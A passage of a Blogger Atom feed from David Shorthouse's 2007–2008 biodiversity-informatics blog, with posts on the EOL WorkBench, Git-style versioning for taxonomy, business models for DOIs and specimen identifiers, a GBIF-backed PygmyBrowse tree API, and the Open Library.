"WorkDesk", or "LifeDesk" focus for development is in the right direction, we should be looking for shortcuts like these that capture user activity, use third party APIs in the background, and later repurpose the data in other interesting ways. If we are going to parasitize systematists workflows, we best get every ounce of potential data out of the time they consume.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3044087211698183030?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3044087211698183030/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3044087211698183030' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3044087211698183030'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3044087211698183030'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/03/i-got-useful-dataand-caught-you-unaware.html' title='I Got Useful Data...and Caught You Unaware'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6223979699933606209</id><published>2008-03-16T08:01:00.004-06:00</published><updated>2008-03-16T08:42:25.304-06:00</updated><title type='text'>Where's David?</title><content type='html'>It has been an exceptionally long time since the last post. But, there were a few life-changing events that took precedence.&lt;br /&gt;&lt;br /&gt;For starters, I'm now the WorkBench project leader for the &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; and am living on Cape Cod with my family.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?ie=UTF8&amp;amp;hl=en&amp;amp;msa=0&amp;amp;ll=41.529142,-70.643635&amp;amp;spn=0.048833,0.114155&amp;amp;msid=116660870661584453925.0004488e97e989dee189e&amp;amp;output=embed&amp;amp;s=AARTsJrNAOnuENfkWUUGxJEsaeaSJvAMsQ"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org"&gt;The Canadian Arachnologist&lt;/a&gt; and &lt;a href="http://www.spiderwebwatch.org"&gt;Spider WebWatch&lt;/a&gt; sites are stilled served from a desktop server. But, I have passed the editorial torch for the &lt;a href="http://www.canadianarachnology.org/newsletters/"&gt;newsletter&lt;/a&gt; to &lt;a href="http://www.canadianarachnology.org/members/77.htm"&gt;Dr. Robin Leech&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I am also in the midst of buying my first home, which is no end of fun. Banks are quick to take your money, but aren't so quick to give it away, especially if your credit rating is invisible from the other side of an international border.&lt;br /&gt;&lt;br /&gt;Just to prove that I have been toying with new things, here's a list containing a taste of things to come with the EOL WorkBench, which by the way I'm pushing for a rename. I'll let you fill in the blanks... ;)~&lt;br /&gt;&lt;br /&gt;&lt;a href="http://drupal.org"&gt;Drupal&lt;/a&gt;&lt;br /&gt;&lt;a href="http://extjs.com/"&gt;ExtJS&lt;/a&gt;&lt;br /&gt;&lt;a href="http://search.cpan.org/~mjewell/Biblio-Citation-Parser-1.10/"&gt;Biblio::Citation::Parser&lt;/a&gt;&lt;br /&gt;&lt;a href="http://dev.jquery.com/view/trunk/plugins/autocomplete/"&gt;jQuery multiple autocomplete&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6223979699933606209?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6223979699933606209/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6223979699933606209' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6223979699933606209'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6223979699933606209'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/03/wheres-david.html' title='Where&apos;s David?'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1815855504121332473</id><published>2007-10-30T14:06:00.000-06:00</published><updated>2007-10-30T15:06:33.176-06:00</updated><title type='text'>Taxonomic Consensus as Software Creation</title><content type='html'>It occurred to me today that the process of reaching taxonomic consensus or developing a master database of vetted names like that undertaken by &lt;a href="http://www.catalogueoflife.org/search.php"&gt;The Catalogue of Life Partnership&lt;/a&gt; (CoLP) is not unlike software development that necessarily requires some sort of framework to manage versioning. However, taxonomic activities and building checklists do not currently have a development framework. We likely have a set of rules and guidelines, but infighting and bickering no doubt fragment interest groups, which ultimately leads to the stagnation, abandonment, and eventual distrust of big projects like CoLP. We have organizations like the &lt;a href="http://www.iczn.org/"&gt;International Commission on Zoological Nomenclature&lt;/a&gt; to manage the act of naming animals but there is nothing concrete out the other end to actually organize the names. Publications are merely the plums in a massive bowl of pudding. And, it is equally frustrating to actually find these publications. One way to approach a solution to this is to equate systematics with perpetual software development where subgroups manage branches of the code and occasionally perform commits to (temporarily) lock the code. Like with software development, groups of files (&lt;em&gt;i.e.&lt;/em&gt; branches on the tree of life) and the files themselves (&lt;em&gt;i.e.&lt;/em&gt; publications, images, genomic data, etc.) ought to be tracked with unique identifiers and time-stamps. This would be a massively complex shift in how taxonomic business is conducted, but what other solution is there?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RyeWwgTYUfI/AAAAAAAAAE8/oV7qklG0pps/s1600-h/git-logo.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RyeWwgTYUfI/AAAAAAAAAE8/oV7qklG0pps/s320/git-logo.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5127232460833706482" /&gt;&lt;/a&gt;Without really understanding distributed environments in software development...it's too geeky for me...I spent a few moments watching a Google TechTalk presentation by Randal Schwartz delivered at Google October 12, 2007 about &lt;a href="http://git.or.cz/"&gt;Git&lt;/a&gt;, a project spearheaded by Linus Torvalds: &lt;a href="http://video.google.com/videoplay?docid=-1019966410726538802"&gt;http://video.google.com/videoplay?docid=-1019966410726538802&lt;/a&gt; (sorry, embedding has apparently been disabled by request). &lt;br /&gt;&lt;br /&gt;There are some really interesting parallels between distributed software development environments like Git and what we ought to be working toward in systematics, especially as we move toward using Life Sciences Identifiers (LSIDs). Here are a few summarized points from Randal's presentation:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Git manages changes to a tree of files over time&lt;/li&gt;&lt;li&gt;Optimized for large file sets and merges&lt;/li&gt;&lt;li&gt;Encourages speculation with the construction of trial branches&lt;/li&gt;&lt;li&gt;Anyone can clone the tree, make &amp; test local changes&lt;/li&gt;&lt;li&gt;Uses "Universal Public Identifiers"&lt;/li&gt;&lt;li&gt;Has multi-protocal transport like HTTP and SSH&lt;/li&gt;&lt;li&gt;One can navigate back in time to view older trees of file sets via universal public identifiers&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;With a cross-platform solution and a facile user interface, perhaps thinking in these terms will help engage taxonomists and will ultimately lead to a &lt;a href="http://www.zoobank.org"&gt;ZooBank&lt;/a&gt; global registry of new taxon names.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1815855504121332473?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1815855504121332473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1815855504121332473' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1815855504121332473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1815855504121332473'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/taxonomic-consensus-as-software.html' title='Taxonomic Consensus as Software Creation'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RyeWwgTYUfI/AAAAAAAAAE8/oV7qklG0pps/s72-c/git-logo.png' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6909101399848292199</id><published>2007-10-25T10:17:00.000-06:00</published><updated>2007-10-25T13:31:34.918-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><category scheme='http://www.blogger.com/atom/ns#' term='BHL'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>Buying &amp; Selling DOIs...and the same for specimens</title><content type='html'>A &lt;a href="http://ispiders.blogspot.com/2007/10/biodiversity-informatics-needs-business.html"&gt;previous post&lt;/a&gt; of mine described the business model for digital object identifiers in albeit simplistic terms. But, perhaps I should back up a second. Just what the heck is a DOI and why should the average systematist care? [Later in this post, I'll describe an interesting business model for biodiversity informatics]&lt;br /&gt;&lt;br /&gt;Rod Page &lt;a href="http://iphylo.blogspot.com/2007/10/bhl-and-dois.html"&gt;recently wrote a post&lt;/a&gt; in iPhylo that does a great job of selling the concept. Permit me to summarize and to add my own bits:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;DOIs are strings of numbers &amp; letters that uniquely identify something in the digital realm. In the case of published works, they uniquely identify that work.&lt;/li&gt;&lt;li&gt;DOIs are resolvable and can be made actionable. i.e. you can put http://dx.doi.org/ in front of a DOI and, through the magic of HTTP, you get redirected to the publisher's offering or the PDF or HTML version of the paper&lt;/li&gt;&lt;li&gt;DOIs have metadata. If you have for example a citation to a reference, you can obtain the DOI. Conversely, if you have a DOI, you can get the metadata&lt;/li&gt;&lt;li&gt;DOIs are a business model. Persistent URLs (championed by many) are not a business model because there is no transfer of funds &amp; confidences&lt;/li&gt;&lt;br /&gt;&lt;/ol&gt;&lt;br /&gt;Systematists have lamented that their works on delineating &amp; describing species don't get cited in the primary literature. If they published in journals that stamped DOIs on their works or if they participated in helping journals get DOIs for back-issues or future publications, then outfits like the &lt;a href="http://www.biodiversitylibrary.org/"&gt;Biodiversity Heritage Library&lt;/a&gt; would have an easier time mapping taxon names to published works. For example, searching not for a publication but a taxon name in Biodiversity Heritage Library (protoype &lt;a href="http://www.biodiversitylibrary.org/NameSearch.aspx"&gt;HERE&lt;/a&gt;) would not only provide a list of works in BHL that used the name somewhere in its text, it could provide a &lt;a href="http://www.crossref.org/02publishers/forward_linking_howto.html"&gt;forward-linking gadget&lt;/a&gt; from CrossRef. The end user would have an opportunity to do his or her own cognitive searching:&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ijLDxgALc2c&amp;rel=1"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ijLDxgALc2c&amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;There is nothing stopping an outfit like the Biodiversity Heritage Library from using Handles or some other globally unique identifer. But, doing so cuts off the possibility of injecting old works back into contemporary use because they will not be embedded into a widely used cross-linking framework.&lt;br /&gt;&lt;h2&gt;MOIs for Sale&lt;/h2&gt;&lt;br /&gt;The Global Biodiversity Information Facility and The Encyclopedia of Life must also be active participants in the adoption of globally unique identifiers. But again, there must be a business model. So, here's a business model in relation to museum specimens:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;A registry sells a "MOI" - Museum Object Identifier (my creation of course) at 1 cent per labelled specimen.&lt;/li&gt;&lt;li&gt;The price will go up to 2 cents a specimen after 2020, the usual year given for various National Biodiversity Strategies. Translation: get your act together because it'll cost more later.&lt;/li&gt;&lt;li&gt;All MOIs must have DarwinCore metadata&lt;/li&gt;&lt;li&gt;The registry sets up a resolver identical in functionality to DOIs&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;Now, before all the curators out there scream bloody murder, let's stop and think about this and put a creative, financial spin on the possibilities. Craig Newmark, the founder of the ever popular Craig's List, was recently interviewed on Stephen Colbert's &lt;em&gt;Colbert Report&lt;/em&gt; where he mentioned &lt;a href="http://www.donorschoose.org"&gt;Donor's Choose&lt;/a&gt; (&lt;a href="http://www.indecision2008.com/blog.jhtml?c=vc&amp;videoId=121749"&gt;see interview&lt;/a&gt;). If you're not familiar with that new service, here's the slogan: "Teachers ask. You choose. Students learn."  &lt;blockquote&gt;DonorsChoose.org is a simple way to provide students in need with resources that our public schools often lack. At this not-for-profit web site, teachers submit project proposals for materials or experiences their students need to learn. These ideas become classroom reality when concerned individuals, whom we call Citizen Philanthropists, choose projects to fund.&lt;/blockquote&gt;&lt;br /&gt;There's a lot of interest in The Encyclopedia of Life and the Biodiversity Heritage Library now. Let's set-up a global "Donor's Choose" clone called something like "Biodiversity Knowledge Fund" (though that's not catchy enough) to be locally administered by daughter organizations to EOL and the BHL in countries throughout the world. Funds then are transferred to institutions of the donor's choosing. Museums then accept the funds donated to them and turn around and buy "MOIs". What would prevent a museum from taking the money specifically donated to them and spending it on things other than MOIs? Nothing. But, their specimens then aren't indexed. Are you a philanthropist or have 20 dollars (or francs, rubles, pounds, pesos, dinar, lira, &lt;em&gt;etc.&lt;/em&gt;) you'd like to donate? Want to fund biodiversity but don't know how? Here's an answer. But is such a "Biodiversity Knowledge Fund" sustainable? No, but it's a start.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6909101399848292199?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6909101399848292199/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6909101399848292199' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6909101399848292199'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6909101399848292199'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/buying-selling-doisand-same-for.html' title='Buying &amp; Selling DOIs...and the same for specimens'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8923159062614006286</id><published>2007-10-24T13:23:00.000-06:00</published><updated>2007-10-25T13:32:20.812-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='GUIDs'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>Biodiversity Informatics Needs a Business Model</title><content type='html'>Publishers and (most) librarians understand that digital object identifiers (doi) associated with published works are more than just persistent codes that uniquely identify items. They are built into the social fabric of the publishing industry. Because monies are transferred for the application and maintenance of a doi, the identifier is persistent. It's really because of this "feature" that tools like cross-linking and forward-linking can be built and that these new tools will themselves persist. The nascent biodiversity informatics community is attempting to do all the fun stuff (myself included) like building taxonomic indices, gadgetry to associate names and concepts with other things like literature, images, and specimens without first establishing a long-term solution for how the persistence of all these new tools will be established. Let me break it down another way:&lt;br /&gt;&lt;br /&gt;Publishers buy dois and pay an annual subscription. In turn, the extra fee for the doi is passed down the chain to the journal &amp; its society. The society then passes the extra fees on to either an author in the way of page fees or to the subscribers of the journal. Since the majority of subscribers are institutions and authors receive research grants from federal agencies, ultimately, the fractions of pennies that merge to pay for a single doi come from tax payers' wallets and purses. So, dois fit nicely into the fabric of society and really do serve a greater purpose than merely uniquely identifying a published object. Then, and only then, can the nifty tools CrossRef provides be made available. Then, third parties may use these tools with confidence.&lt;br /&gt;&lt;br /&gt;Not surprisingly, the biodiversity informatics community has latched on to the nifty things one can do with globally unique identifiers because everybody wants to "do things" by connecting one another's resources. Some very important and extremely interesting answers to tough questions can only be obtained by doing this work. Also not suprisingly, there is now a mess of various kinds of supposed globally unique identifiers (GUIDs) because big players want to be &lt;em&gt;the&lt;/em&gt; clearinghouse much as CrossRef is &lt;em&gt;the&lt;/em&gt; clearinghouse for dois. But they have all missed the point.&lt;br /&gt;&lt;br /&gt;So, how do we instill confidence in the use of LSIDs, ITIS TSNs, the various NCBI database id's, &lt;em&gt;etc.&lt;/em&gt; without a heap of silos with occasional casualities? Get rid of them or at least clearly associate what kind of object gets what kind of identifier along with a business model where there will be persistent, demonstrable transfer of funds. The use of Semantic Web tools is merely a band-aid for a gushing wound. When I say persistent transfer of funds, I don't mean assurances that monies will come from federal grants or wealthy foundations in order to maintain those identifiers. I mean an identifier that is woven into the fabric and workflow of the scientific community. This may be easier said than done because other than publications, the scientific community (especially systematists and biologists) aren't in the business of producing &lt;em&gt;anything&lt;/em&gt; tangible except publications. CrossRef has that angle very well covered. So, what else do scientists (the systematics community is what I'm most interested in) produce that can be monetized? Specimens, gene sequences, and perhaps a few other objects. We need several non-profits like CrossRef with the guts to demand monies for the assignment of persistent identifiers. Either we adopt this as a business model or we monetize some services (e.g. something like Amazon Web Services as &lt;a href="http://ispiders.blogspot.com/2007/06/digir-for-collectors.html"&gt;previously discussed&lt;/a&gt;) that directly, clearly, and unequivocally feed into the maintenance of all the shiny new GUIDs.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8923159062614006286?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8923159062614006286/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8923159062614006286' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8923159062614006286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8923159062614006286'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/biodiversity-informatics-needs-business.html' title='Biodiversity Informatics Needs a Business Model'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-23452652721988975</id><published>2007-10-16T23:58:00.000-06:00</published><updated>2007-10-17T01:30:07.257-06:00</updated><title type='text'>PygmyBrowse Classification Tree API</title><content type='html'>Yay, a new toy! This one ought to be useful for lots of biodiversity/taxonomic web sites. First, I'll let you play with it (click the image):&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/pygmy/GBIF.htm"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RxW5q4CWvNI/AAAAAAAAAE0/_e7Mdc2aDFs/s320/trees.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5122204297451715794" /&gt;&lt;/a&gt;&lt;br /&gt;Seems I always pick up where &lt;a href="http://iphylo.blogspot.com/"&gt;Rod Page&lt;/a&gt; leaves off. Not sure if this is a good thing or not. However, we do have some worthwhile synergies. Rod has cleaned up and simplified his old (Sept. 2006) &lt;a href="http://iphylo.blogspot.com/2006/09/pygmybrowse.html"&gt;version of PygmyBrowse&lt;/a&gt;. Earlier this week, he made an &lt;a href="http://iphylo.blogspot.com/2007/10/pygmybrowse-gbif-classification.html"&gt;iframe version&lt;/a&gt; and put it on his iPhylo blog. Like Rod, I dislike a lot of the classification trees you come across on biodiversity/taxonomic web sites because these ever-expanding monstrosities eventually fill the screen and are a complete mess. When you click a hyperlinked node, you often have to wait while the page reloads and the tree re-roots itself...not pretty. Trees are supposed to simplify navigation and give a sense of just how diverse life on earth really is. The &lt;a href="http://developer.yahoo.com/yui/treeview/"&gt;Yahoo YUI TreeView&lt;/a&gt; is OK because it's dynamic, but it desperately needs to handle overflow for exceptionally large branches as is the case with classification trees in biology. What did I do that's different from Rod's creation?&lt;br /&gt;&lt;br /&gt;I convinced Dave Martin (&lt;a href="http://www.gbif.org"&gt;GBIF&lt;/a&gt;) to duplicate the XML structure Rod used to fill the branches in his PygmyBrowse and to also do the same with JSON outputs. This is the beta &lt;a href="http://wiki.gbif.org/dadiwiki/wikka.php?wakka=ClassificationSearchAPI"&gt;ClassificationSearchAPI&lt;/a&gt;, which will soon be available from the main GBIF web services offerings. When the service is out of beta, I'll just adjust one quick line in my code.&lt;br /&gt;&lt;br /&gt;I jumped at the chance to preserve the functionality Rod has in his newly improved, traditional XMLHTTP-based PygmyBrowse and write one as an object-oriented JavaScript/JSON-based version. My goal is to have a very simple API for developers and end users who wish to have a remotely obtained, customizable classification tree on their websites. Plus, I want this API to accept an XML containing taxon name and URL elements (e.g. a &lt;a href="https://www.google.com/webmasters/tools/docs/en/protocol.html"&gt;Google sitemap&lt;/a&gt;) such that the API will parse it and adjust the behaviour of the links in the tree. In other words, just like you can point the Google Map API to an XML file containing geocoded points for pop-ups, I wanted to author this API to grab an XML and magically insert little, clickable icons next to nodes or leaves that have correspoding web pages on my server. Think of this as a hotplugged, ready-made classification naviagator. This is something you cannot do with an iframe version because it's stuck on the server and you can't stick your fingers in it and play with it. Sorry, Rod.&lt;br /&gt;&lt;br /&gt;The ability to feed an XML to the tree isn't yet complete, but the guts are all in place in the JavaScript. You can specify a starting node (homonym issues haven't yet been dealt with but I'll do that at some point), the size of the tree, the classification system to use (e.g. Catalogue of Life: 2007 Annual Checklist or Index Fungorum, among others), and you can have as many of these trees on one page as you wish. You just have to pray GBIF servers don't collapse under the strain. So, you could use this API as a very simple way to eyeball 2+ simultaneous classifications. The caveat of course is that GBIF must make these available in the API. So, hats off to GBIF and Dave Martin. These are very useful and important APIs.&lt;br /&gt;&lt;br /&gt;Last month, &lt;a href="http://lists.tdwg.org/pipermail/tdwg/2007-September/000258.html"&gt;I proposed&lt;/a&gt; that the Biodiversity Informatics community develop a programmableweb.com clone called programmablebiodiversity.org. There are more and more biodiversity-related APIs available, many of which produce JSON in addition to the usual XML documents via REST. Surely people more clever than me can produce presentational &amp; analytical gadgets if there was a one-stop-shop for all the APIs and a showcase for what people are doing with these data services. The response from TDWG was luke-warm. I think there's a time and place for development outside the busy work of standards creation. But, there were a few very enthusiastic responses from Tim Robertson, Donald Hobern, Lee Belbin, Vince Smith and a few others. It turns out that Markus Döring and the EDIT team in Berlin have been creating something approaching my vision called BD (Biodiversity) Tracker at &lt;a href="http://www.bdtracker.net"&gt;http://www.bdtracker.net&lt;/a&gt;. I just hope they clean it up and extend it to approximate the geekery in programmableweb.com with some clean cut recipes for people to dive into using APIs like this. [Aside: Is it just me or all the Drupal templates starting to look a little canned and dreary?].&lt;br /&gt;&lt;br /&gt;There's plenty more I want to do with this JSON-based PygmyBrowse so if you have ideas or suggestions, by all means drop a comment. Rod wants to contribute this code to an open-source repository &amp; I'll be sure to contribute this as a subproject.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-23452652721988975?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/23452652721988975/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=23452652721988975' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/23452652721988975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/23452652721988975'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/pygmybrowse-classification-tree-api.html' title='PygmyBrowse Classification Tree API'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RxW5q4CWvNI/AAAAAAAAAE0/_e7Mdc2aDFs/s72-c/trees.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4410985641514569679</id><published>2007-10-03T03:00:00.000-06:00</published><updated>2007-10-03T04:17:04.910-06:00</updated><title type='text'>The Open Library</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RwNipTFpAcI/AAAAAAAAAEs/ayDusNEx1ng/s1600-h/front_page.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RwNipTFpAcI/AAAAAAAAAEs/ayDusNEx1ng/s320/front_page.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5117042063261106626" /&gt;&lt;/a&gt;&lt;br /&gt;I stumbled on an amazing new project lead by &lt;a href="http://www.aaronsw.com/"&gt;Aaron Swartz&lt;/a&gt; called the &lt;a href="http://demo.openlibrary.org/"&gt;Open Library&lt;/a&gt; - not be confused with this &lt;a href="http://www.openlibrary.org/"&gt;Open Library&lt;/a&gt; though there appears to be some resemblance. What strikes me about Aaron's project is that it is so relevant to &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt; it scares me that I haven't yet heard of it. According to their "About the technology" page:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Building Open Library, we faced a difficult new technical problem. We wanted a database that could hold tens of millions of records, that would allow random users to modify its entries and keep a full history of their changes, and that would hold arbitrary semi-structured data as users added it. Each of these problems had been solved on its own, but nobody had yet built a technology that solved all three together.&lt;/blockquote&gt;&lt;br /&gt;The consquence of all this is that there is a front-facing page for every book with the option to edit the metadata. All versioning and users are tracked. The content of the "&lt;a href="http://demo.openlibrary.org/about"&gt;About Us&lt;/a&gt;" page sounds eerily like E. O. Wilson's proclamations in his 2003 opinion piece in TREE (&lt;a href="http://dx.doi.org/10.1016/S0169-5347(02)00040-X"&gt;doi:10.1016/S0169-5347(02)00040-X&lt;/a&gt;). For those of you who don't recognize the name, Aaron Swartz, he's the whiz behind a lot of important functionality on the web we see today. It's also worth reading his multi-part thoughts on the spirit of &lt;a href="http://www.aaronsw.com/weblog/wikiroads"&gt;Wikipedia&lt;/a&gt; and why it may soon hit a wall.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4410985641514569679?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4410985641514569679/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4410985641514569679' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4410985641514569679'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4410985641514569679'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/open-library.html' title='The Open Library'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RwNipTFpAcI/AAAAAAAAAEs/ayDusNEx1ng/s72-c/front_page.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1250966238359263816</id><published>2007-09-30T00:06:00.000-06:00</published><updated>2007-10-25T13:33:05.192-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>DOIs in 